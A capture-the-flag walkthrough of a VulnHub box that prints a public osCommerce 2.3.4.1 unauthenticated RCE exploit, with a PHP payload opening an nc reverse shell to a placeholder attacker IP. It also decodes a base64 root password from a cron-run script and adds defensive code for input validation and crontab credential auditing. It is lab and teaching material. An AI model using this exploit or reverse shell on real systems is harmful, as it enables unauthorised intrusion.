This will also be brief. It’s FUNBOX: UNDER CONSTRUCTION! from VulnHub:
As always, it’s a very easy box for beginners.
This one has SSH, HTTP and various mail ports - for SMTP, POP3 and IMAP. We’re interested in the web stuff.
On the web server we find osCommerce Online Merchant v2.3.4.1, which has various public exploits. We can grab an unauthenticated RCE exploit from searchsploit and edit it:
# Exploit Title: osCommerce Remote Code Execution
# Date:
# Exploit Author: Simon Scannell - <[email protected]>
# Version:, 2.3.4 - Other versions have not been tested but are likely to be vulnerable
# Tested on: Linux, Windows
#
# If an Admin has not removed the /install/ directory as advised from an osCommerce installation, it is possible
# for an unauthenticated attacker to reinstall the page. The installation of osCommerce does not check if the page
# is already installed and does not attempt to do any authentication. It is possible for an attacker to directly
# execute the "install_4.php" script, which will create the config file for the installation. It is possible to inject
# PHP code into the config file and then simply execute the code by opening it.

import requests

# enter the target url here, as well as the url to install.php (Do NOT remove the ?step=4)
base_url = ""
target_url = ""

data = {}

# the payload will be injected into the configuration file via this code
# ' define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .
# so the format for the exploit will be: '); PAYLOAD; /*
payload = '\');'
payload += 'system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER_IP> 1234 >/tmp/f");'  # this is where you enter your PHP payload (<ATTACKER_IP> is a placeholder; the address was lost from the page)
payload += '/*'
data['DB_DATABASE'] = payload

# exploit it
r = requests.post(target_url, data=data)

if r.status_code == 200:
    print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php")
else:
    print("[-] Exploit did not execute as planned")
Note that the above has been modified with the correct URLs, and it sends me a reverse shell, like so:
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 33868
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash");'
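To make the mechanics of that injection concrete from the defender's side, here is an added example (my own code, not the exploit's and not osCommerce's). It models the single line from install_4.php quoted in the exploit's comment: the POSTed DB_DATABASE value is trimmed and dropped between single quotes with no escaping, so a value of the form `'); ...; /*` closes the define() call, appends a statement, and comments out the rest of the line. Beside the vulnerable builder sits a hardened one that only accepts identifier-like database names (an allow-list I am proposing for illustration, not a patch from the project), plus a small checker for a generated configure.php line that no longer looks like exactly one define() statement.

```python
import re

# Vulnerable: mirrors the concatenation shown in the exploit's comment,
#   ' define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n"
# i.e. trim the value and wrap it in single quotes, with no escaping at all.
def build_define_line(db_name: str) -> str:
    return " define('DB_DATABASE', '" + db_name.strip() + "');\n"

# Hardened builder (illustrative allow-list, not from the osCommerce code base):
# a MySQL database name in a config file has no business containing quotes,
# semicolons or comment markers, so only accept identifier characters.
DB_NAME_RE = re.compile(r"^[A-Za-z0-9_]{1,64}$")

def build_define_line_safe(db_name: str) -> str:
    name = db_name.strip()
    if not DB_NAME_RE.fullmatch(name):
        raise ValueError("DB_DATABASE must be an identifier, got %r" % name)
    return " define('DB_DATABASE', '" + name + "');\n"

# Post-hoc check a reviewer could run over a generated configure.php line:
# a healthy line is a single define(...) statement, so exactly one ';' and
# no PHP comment markers. Anything else suggests a broken-out quote.
def looks_injected(config_line: str) -> bool:
    body = config_line.strip()
    return body.count(";") != 1 or "/*" in body or "*/" in body

if __name__ == "__main__":
    # Benign demonstration value (constructed): closes the quote, adds a call,
    # and comments out the trailing "');" that the template appends.
    for name in ("oscommerce", "'); phpinfo(); /*"):
        line = build_define_line(name)
        print(repr(line), "-> injected" if looks_injected(line) else "-> clean")
        try:
            build_define_line_safe(name)
            print("  safe builder: accepted")
        except ValueError as exc:
            print("  safe builder: rejected ->", exc)
```

The check in `looks_injected` is deliberately coarse; the point is that the vulnerable builder turns one untrusted POST field into arbitrary PHP source, and that the fix is validating the value before it is ever written into a file the web server will later execute (and, per the exploit header, removing `/install/` after setup).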
I’m going to explain this slightly backwards. There is a cron job running as the user joe:
root@funbox10:/var/spool/cron/crontabs# cat joe
cat joe
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.wWLDXL/crontab installed on Mon Jul 19 13:24:20 2021)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
# Edit this file to introduce tasks to be run by cron.
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# For more information see the manual pages of crontab(5) and cron(8)
# m h dom mon dow command
*/1 * * * * /usr/share/doc/examples/
Which is calling a shell script we can read:
www-data@funbox10:/$ cat /usr/share/doc/examples/
cat /usr/share/doc/examples/
# sample file
# 0 20 * * * /bin/goahead --parameter: LXUgcm9vdCAtcCByZnZiZ3QhIQ==
And that file contains the root password, base64-encoded:
www-data@funbox10:/$ echo LXUgcm9vdCAtcCByZnZiZ3QhIQ== | base64 -d
echo LXUgcm9vdCAtcCByZnZiZ3QhIQ== | base64 -d
-u root -p rfvbgt!!www-data@funbox10:/$ su root
su root
Password: rfvbgt!!
root@funbox10:/# id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
Sun Aug 1 12:14:04 CEST 2021
How did we know this? pspy can find it, although it seems a bit flaky. Anyhoo, we move on…
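The privilege escalation here is a credential sitting in a file that cron runs, hidden only by base64. As an added example (my own code, not from the walkthrough or from pspy), the script below audits a crontab and the scripts it invokes for base64 tokens that decode to printable text containing a password-like pattern. The sample crontab and script contents are constructed inline; they follow the shape of what the post shows, with the script filename made up because the real one is cut off above, and the base64 token is the one from the page.

```python
import base64
import re
import shlex

# Constructed sample inputs, not read from a live host. The script path is a
# placeholder; the encoded token is the one shown in the walkthrough.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
*/1 * * * * /usr/share/doc/examples/sample-job.sh
0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
"""

SAMPLE_FILES = {
    "/usr/share/doc/examples/sample-job.sh": (
        "# sample file\n"
        "# 0 20 * * * /bin/goahead --parameter: LXUgcm9vdCAtcCByZnZiZ3QhIQ==\n"
    ),
}

# A standalone run of 16+ base64 characters with optional padding.
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")
# Heuristics for "this decoded to a credential": a -p flag, password words, pwd=.
CRED_HINT = re.compile(r"(?i)(^|\s)-p\s|passw(or)?d|--password|pwd=")


def cron_commands(crontab_text):
    """Yield the command part of each active crontab line (5 time fields + command)."""
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 5)
        if len(parts) == 6:
            yield parts[5]


def decode_if_text(token):
    """Return the decoded string if the token is valid base64 for printable text."""
    try:
        text = base64.b64decode(token, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def find_encoded_credentials(text):
    """Return (token, decoded) pairs whose decoded form matches a credential hint."""
    hits = []
    for match in B64_TOKEN.finditer(text):
        decoded = decode_if_text(match.group(0))
        if decoded and CRED_HINT.search(decoded):
            hits.append((match.group(0), decoded))
    return hits


def audit(crontab_text, files):
    """Audit every script a crontab runs; `files` maps path -> contents."""
    findings = []
    for cmd in cron_commands(crontab_text):
        try:
            argv = shlex.split(cmd)
        except ValueError:
            argv = cmd.split()
        for path in argv:
            if path in files:
                for token, decoded in find_encoded_credentials(files[path]):
                    findings.append({"command": cmd, "file": path,
                                     "token": token, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_CRONTAB, SAMPLE_FILES):
        print("[!] %s (run by: %s)\n    %s -> %r" % (f["file"], f["command"], f["token"], f["decoded"]))
```

On a real system you would feed it `/var/spool/cron/crontabs/*` and `/etc/cron*` and read each referenced script from disk; keeping the file contents as a dict here just lets the logic run offline. The same scan also catches the commented-out line in the sample, which is the whole point: a "sample file" that nothing executes is still a password on disk, readable by any user who can read the script.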